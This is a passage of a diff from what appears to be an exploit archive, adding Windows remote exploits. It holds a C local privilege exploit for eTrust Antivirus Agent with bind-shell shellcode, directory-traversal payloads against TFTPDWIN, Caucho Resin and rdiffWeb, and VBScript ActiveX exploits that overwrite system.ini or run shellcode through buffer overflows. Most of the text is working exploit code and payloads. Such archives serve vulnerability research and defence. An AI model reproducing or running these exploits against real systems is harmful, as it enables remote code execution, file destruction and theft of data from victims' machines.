test machine under XP-SP2, the PoC i have coded search in AnsiCodePageData
mapping in order to try to find one valid for your machine if XPSP2 or W2K3 are
detected, perhaps there are other ways to exploit it in a more efficient way but
this is only a PoC.
Disassembly:
////////////////////////////////////////////////////////////////////////////////////////////////
QSIGetQueuePath
.text:6DC82BD0 QSIGetQueuePath proc near ; CODE XREF: QSIGetQueueUsersFile+24p
.text:6DC82BD0 ; QSIGetQueueJobsFile+24p ...
.text:6DC82BD0
.text:6DC82BD0 var_110 = byte ptr -110h
.text:6DC82BD0 var_4 = dword ptr -4
.text:6DC82BD0 arg_0 = dword ptr 8
.text:6DC82BD0 arg_4 = dword ptr 0Ch
.text:6DC82BD0 arg_8 = dword ptr 10h
.text:6DC82BD0 arg_C = dword ptr 14h
.text:6DC82BD0
.text:6DC82BD0 push ebp
.text:6DC82BD1 mov ebp, esp
.text:6DC82BD3 and esp, 0FFFFFFF8h
.text:6DC82BD6 sub esp, 110h
.text:6DC82BDC mov eax, dword_6DC913F8
.text:6DC82BE1 mov [esp+110h+var_4], eax
.text:6DC82BE8 push esi
.text:6DC82BE9 mov esi, [ebp+arg_4]
.text:6DC82BEC push edi
.text:6DC82BED xor eax, eax
.text:6DC82BEF mov [esp+118h+var_110], 0
.text:6DC82BF4 mov ecx, 40h
.text:6DC82BF9 lea edi, [esp+9]
.text:6DC82BFD rep stosd
.text:6DC82BFF stosw
.text:6DC82C01 stosb
.text:6DC82C02 mov eax, [ebp+arg_C]
.text:6DC82C05 test eax, eax
.text:6DC82C07 mov byte ptr [esi], 0
.text:6DC82C0A jz loc_6DC82CA2
.text:6DC82C10 mov eax, [ebp+arg_8]
.text:6DC82C13 test eax, eax
.text:6DC82C15 mov edi, [ebp+arg_0]
.text:6DC82C18 jnz short loc_6DC82C2F
.text:6DC82C1A mov ecx, _filemap
.text:6DC82C20 mov eax, edi
.text:6DC82C22 imul eax, 194h
.text:6DC82C28 lea eax, [eax+ecx-144h]
.text:6DC82C2F
.text:6DC82C2F loc_6DC82C2F: ; CODE XREF: QSIGetQueuePath+48j
.text:6DC82C2F push eax ; unsigned __int8 *
.text:6DC82C30 push esi ; unsigned __int8 *
.text:6DC82C31 call ds:_mbscpy <- Here we can trigger the overflow!
And here is the call referenced from QSIGetQueueID ...
.text:6DC85CF3 loc_6DC85CF3: ; CODE XREF: QSIGetQueueID+AAj
.text:6DC85CF3 push 1 ; int
.text:6DC85CF5 push 0 ; int
.text:6DC85CF7 lea ecx, [esp+120h+var_108] < - Overflowed var
.text:6DC85CFB push ecx ; unsigned __int8 *
.text:6DC85CFC push eax ; int
.text:6DC85CFD mov [esp+128h+var_108], 0
.text:6DC85D02 call QSIGetQueuePath <- !!
////////////////////////////////////////////////////////////////////////////////////////////////
References:
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server. (David Litchfield, NGSSoftware).
Vulnerability discovered and analysis performed by:
binagres -=- binagres[4t]gmail.com
--
48Bits[I+D Team]
www.48bits.com
blog.48bits.com
*/
#include <stdio.h>
#include <windows.h>
#define Mapping "Global\\INOQSIQSYSINFO"
#define PathNameOffset 0x24C
#define HandlerOffset (0x2F8+PathNameOffset)
#define Base2Search (BYTE *)(0x7ffb0000) // AnsiCodePageData
//#define Off2popAndRet 0x7FFc07A4 <- This offset works for me on a VMWare witch XPSP2.
#define NOSP_Off2popAndRet (BYTE *)(0x6DC8102B) // Universal offset for SOs without stack protection.
// The address is inside inocore.dll:
// pop edi ; xor eax, eax ; pop ebx ; ret
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
static unsigned char scode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd1"
"\xd7\x17\x54\x83\xeb\xfc\xe2\xf4\x2d\xbd\xfc\x19\x39\x2e\xe8\xab"
"\x2e\xb7\x9c\x38\xf5\xf3\x9c\x11\xed\x5c\x6b\x51\xa9\xd6\xf8\xdf"
"\x9e\xcf\x9c\x0b\xf1\xd6\xfc\x1d\x5a\xe3\x9c\x55\x3f\xe6\xd7\xcd"
"\x7d\x53\xd7\x20\xd6\x16\xdd\x59\xd0\x15\xfc\xa0\xea\x83\x33\x7c"
"\xa4\x32\x9c\x0b\xf5\xd6\xfc\x32\x5a\xdb\x5c\xdf\x8e\xcb\x16\xbf"
"\xd2\xfb\x9c\xdd\xbd\xf3\x0b\x35\x12\xe6\xcc\x30\x5a\x94\x27\xdf"
"\x91\xdb\x9c\x24\xcd\x7a\x9c\x14\xd9\x89\x7f\xda\x9f\xd9\xfb\x04"
"\x2e\x01\x71\x07\xb7\xbf\x24\x66\xb9\xa0\x64\x66\x8e\x83\xe8\x84"
"\xb9\x1c\xfa\xa8\xea\x87\xe8\x82\x8e\x5e\xf2\x32\x50\x3a\x1f\x56"
"\x84\xbd\x15\xab\x01\xbf\xce\x5d\x24\x7a\x40\xab\x07\x84\x44\x07"
"\x82\x84\x54\x07\x92\x84\xe8\x84\xb7\xbf\x06\x08\xb7\x84\x9e\xb5"
"\x44\xbf\xb3\x4e\xa1\x10\x40\xab\x07\xbd\x07\x05\x84\x28\xc7\x3c"
"\x75\x7a\x39\xbd\x86\x28\xc1\x07\x84\x28\xc7\x3c\x34\x9e\x91\x1d"
"\x86\x28\xc1\x04\x85\x83\x42\xab\x01\x44\x7f\xb3\xa8\x11\x6e\x03"
"\x2e\x01\x42\xab\x01\xb1\x7d\x30\xb7\xbf\x74\x39\x58\x32\x7d\x04"
"\x88\xfe\xdb\xdd\x36\xbd\x53\xdd\x33\xe6\xd7\xa7\x7b\x29\x55\x79"
"\x2f\x95\x3b\xc7\x5c\xad\x2f\xff\x7a\x7c\x7f\x26\x2f\x64\x01\xab"
"\xa4\x93\xe8\x82\x8a\x80\x45\x05\x80\x86\x7d\x55\x80\x86\x42\x05"
"\x2e\x07\x7f\xf9\x08\xd2\xd9\x07\x2e\x01\x7d\xab\x2e\xe0\xe8\x84"
"\x5a\x80\xeb\xd7\x15\xb3\xe8\x82\x83\x28\xc7\x3c\x21\x5d\x13\x0b"
"\x82\x28\xc1\xab\x01\xd7\x17\x54";
BYTE * find_jmp (BYTE *lpAddress, DWORD dwSize)
{
DWORD i;
BYTE *p;
BYTE *retval = NULL;
for (i=0;i<(dwSize-4);i++)
{
p = lpAddress + i;
// POP + POP + RET
if ((p[0] > 0x57) && (p[0] < 0x5F) && (p[1] > 0x57) && (p[1] < 0x5F) && (p[2] > 0xC1) && (p[2] < 0xC4))
{
retval = p;
break;
}
// CALL DWORD PTR [ESP+8]
if ( (p[0] == 0xFF) &&
(p[1] == 0x54) &&
(p[2] == 0x24) &&
(p[3]==0x8) )
{
retval = p;
break;
}
}
return retval;
}
void main (int argc, char **argv)
{
HANDLE hMap;
BYTE *lpMap;
int i;
BYTE *Off2popAndRet=NULL;
OSVERSIONINFOA osvi;
printf( " -------------------------------------\n"
" Exploit for eTrust Antivirus Agent r8\n"
" -------------------------------------\n\n"
"binagres -=- binagres[4t]gmail.com\n"
" --\n"
" 48Bits.com\n"
" blog.48bits.com\n\n");
printf("Opening file mapping ... \n");
if ( (hMap = OpenFileMappingA(FILE_MAP_ALL_ACCESS,FALSE, Mapping)) )
{
if ( (lpMap = MapViewOfFile(hMap,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0)) )
{
// Current file path stored in the mapping.
printf("Current path %s\n", lpMap+ PathNameOffset);
}
else
{
printf("Error while Mapping view of file\n");
return;
}
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
// OS detection ...
if ( osvi.dwMajorVersion < 5 )
{
printf("Using universal offset\n");
Off2popAndRet = NOSP_Off2popAndRet;
}
else
{
switch (osvi.dwMinorVersion)
{
case 0:
printf("W2K detected: using universal offset\n");
Off2popAndRet = NOSP_Off2popAndRet;
break;
case 1:
if (lstrcmpi("Service Pack 2", osvi.szCSDVersion))
{
Off2popAndRet = NOSP_Off2popAndRet;
printf("WXP - %s - detected, using universal offset\n",osvi.szCSDVersion);
}
else
{
printf("WXP - SP2 Detected no universal offset\n");
}
break;
case 2:
printf("W2K3 - %s - detected no universal offset\n");
break;
}
}
// Try to find the jmpcode by other way...
if (!Off2popAndRet)
{
Off2popAndRet = find_jmp(Base2Search,0x20000);
}
// Have we any jmp code?
if(Off2popAndRet)
{
printf("Valid Offset found at 0x%p!!\n", Off2popAndRet);
// Write Shellcode
for ( i = 0 ; i< sizeof(scode) ; i++ )
{
*(lpMap+ PathNameOffset + i) = scode[i];
}
// Fill the rest of the map - we want an access exception!! :-)
for ( i = PathNameOffset + sizeof(scode) - 1; i<0x1000 ; i++ )
{
*(lpMap+i) = 0x90;
}
// Offsets and jmps party
* ((DWORD *)(lpMap+ HandlerOffset - 4)) = 0x909006EB; // jmp $+6
* ((DWORD *)(lpMap+ HandlerOffset)) = (DWORD) Off2popAndRet;
* ((DWORD *)(lpMap+ HandlerOffset + 4)) = 0xFFFCFFE9; // for..
* ((BYTE *)(lpMap+ HandlerOffset + 8)) = 0xFF; // jmp (shellcode)
printf("Attack launched ... wait a few seconds and try \"telnet localhost 4444\" \n");
}
else
{
printf("Cannot find a jmpcode try it by yourself :-(\n");
}
}
else
{
printf("Cannot find eTrust filemapping\n");
}
}

16
platforms/windows/remote/30026.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/23937/info
TFTP Server TFTPDWIN is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to gain read/write access to privileged directories and files.
TFTP Server TFTPDWIN 0.4.2 is vulnerable; other versions may also be affected.
../../../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini

11
platforms/windows/remote/30037.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23985/info
Caucho Resin is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data.
Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.
Resin 3.1.0 is vulnerable; other versions may also be affected.
NOTE: According to the application's 3.1.1 change log, these issues affect the server only when installed on Microsoft Windows.
http://www.example.com:8080/%20

11
platforms/windows/remote/30038.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23985/info
Caucho Resin is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data.
Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.
Resin 3.1.0 is vulnerable; other versions may also be affected.
NOTE: According to the application's 3.1.1 change log, these issues affect the server only when installed on Microsoft Windows.
http://www.example.com:8080/%20..\web-inf

46
platforms/windows/remote/30045.html Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/24014/info
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------
<b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite</b>
url: http://www.precisionid.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
all software that use this ocx are vulnerable to these exploits.
If you try this exploit with IE 7, it just stops to answer
-----------------------------------------------------------------------------------------------------
<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
"Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
test.SaveToFile "c:\windows\system_.ini"
MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/11 - Morovia Barcode")
Else
MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/16 - PrecisionID Barcode ActiveX")
End If
End Sub
</script>
</span></span>
</code></pre>

94
platforms/windows/remote/30049.html Executable file
View file

@ -0,0 +1,94 @@
source: http://www.securityfocus.com/bid/24035/info
LEADTOOLS Multimedia is prone to a stack-based buffer-overflow vulnerability because the software fails to adequately check boundaries on data supplied to an ActiveX control method.
An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.
LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.
NOTE: The 'Ltmm15.dll' ActiveX control is included in Digital Music Mentor 2.6.0.4. Other applications may also include the ActiveX control.
<span
class="general1-symbol">--------------------------------------------------------------------------------
Sienzo Digital Music Mentor (DMM) 2.6.0.4 (ltmm15.dll) Buffer Overflow
Exploit
url: http://www.sienzo.com/
price: $59.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched
<b>ltmm15.dll v. 15.1.0.2 is vulnerable to a stack-based buffer
overflow that
allows arbitrary code execution.</b>
<font color="red"><b>This exploits just open calc.exe</b></font>
--------------------------------------------------------------------------------
<object classid="clsid:00150BA1-B1BA-11CE-ABC6-F5B2E79D9E3F"
id="test"></object>
<input language="VBScript" onclick="tryMe()" value="Click here to start
the LockModules test" type="button">
<script language="vbscript">
Sub tryMe
buff = String(296,"A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90")
shellcode =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
egg = buff + get_EIP + nop + shellcode + nop
test.UnlockSupport 1, egg
End Sub
</script>
</span>

9
platforms/windows/remote/30067.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24092/info
rdiffWeb is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
This issue affects rdiffWeb 0.3.5; other versions may also be affected.
http://localhost:8080/browse/?repo=b&path=..%2F..%2F..%2Fetc

9
platforms/windows/remote/30069.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24099/info
The Dart ZipLite Compression ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
Dart ZipLite Compression ActiveX control 1.8.5.3 is vulnerable to this issue; other versions may also be affected.
<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre>

Some files were not shown because too many files have changed in this diff Show more